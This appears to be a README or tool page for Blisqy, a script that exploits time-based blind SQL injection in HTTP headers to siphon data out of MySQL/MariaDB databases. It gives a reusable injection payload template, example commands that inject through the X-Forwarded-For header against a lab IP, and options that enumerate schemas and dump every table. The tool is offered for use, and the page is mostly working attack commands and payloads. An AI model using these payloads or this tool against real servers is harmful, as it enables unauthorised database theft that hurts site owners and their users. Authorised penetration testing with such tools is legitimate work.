Exploitation Tools

Blisqy – Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB)

A slow data siphon for MySQL/MariaDB using bitwise operation on printable ASCII characters, via a blind-SQL injection.

Usage

USAGE:
blisqy.py --server <Web Server> --port <port> --header <vulnerable header> --hvalue <header value> 
          --inject <point of injection>  --payload <custom sql payload> --dig <yes/no> --sleeptime <default 0.5>

Options:
  -h, --help            show this help message and exit
  --server=WEBSERVER    Specify host (web server) IP
  --port=PORT           Specify port
  --header=VULNHEADER   Provide a vulnerable HTTP Header
  --hvalue=HEADERVALUE  Specify the value for the vulnerable header
  --inject=INJECTION    Provide where to inject Sqli payload
  --payload=PAYLOAD     Provide SQL statment/query to inject as payload
  --dig=DIGGER          Automatic Mysql-Schema enumeration (takes time!)
  --sleeptime=SLEEP     Sleep-Time for blind-SQLi query (default : 0.5)
  --interactive=INTERACT
                        Turn interactive mode on/off (default : off)

Basics
Blisqy will assit you enumerate a MySQL/Maria DB after finding a Time-Based Blind Sql injection vulnerability on a web server. Currently, it supports injections on HTTP Headers. You should have identified a potential Blind Sql injection vulnerability on a Webserver as demonstrated on Pentester-Lab (From SQL Injection to Shell II)
So you can’t run Blisqy without :

  • --server : the vulnerable Webserver
  • --port : Which port is the webserver running on?
  • --header : the identified vulnerable HTTP header
  • --hvalue : value for the identified vulnerable HTTP header

and most imporntatly --inject : what to inject after the hvalue (SQLi Payload).

Options :

–inject
After identifying a Time-Based BlindSQL injection on a web-server, this option enables the user craft and insert SQL-injection payloads. The value for this option should look like this :
--inject "' or if((*sql*),sleep(*time*),0) and '1'='1"
Where

  • *sql* – is where SQL Payloads will be inserted and
  • *time* – is where Time-Based test will be inserted.

–sleeptime
Blisqy now accepts user set –sleeptime and it’s inserted on --inject *time*. Always make sure you have fine tuned this value to resonates with your environment and network lantency…. Otherwise you’ll be toased! (the lower the value, the faster we go). E.g. --sleeeptime 0.1

–payload
This option allows the user run their own custom SQL-injection payloads. Other options like --dig and --interactive MUST not be set (should be ignored) for this option to run.

Example :
Command

./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker" 
           --sleeptime 0.1 
           --inject "' or if((*sql*),sleep(*time*),0) and '1'='1" 
           --payload "select @@hostname"

 

–interactive
This option accept two values i.e on or off and it compliments option --dig (this option must be set to yes). If set as --interactive on the user will get to choose which discovered table to enumerate and decide if data from the table should be dumped or not. When set as “–interactive off”, every table gets enumerated and all data dumped.

Getting data from a Table :
The user can decide which columns to extract data from when --interactive is set on. The format looks something like this : column1*column1*column2 – just the column names separated by an asterisk. User can also avoid data collection on a particular table by entering skip instead of the column names.

Example :
Command

./blisqy.py --server 192.168.56.101 --port 80 --header "X-Forwarded-For" --hvalue "hacker" --dig yes 
            --sleeptime 0.1 --interactive on --inject "' or if((*sql*),sleep(*time*),0) and '1'='1"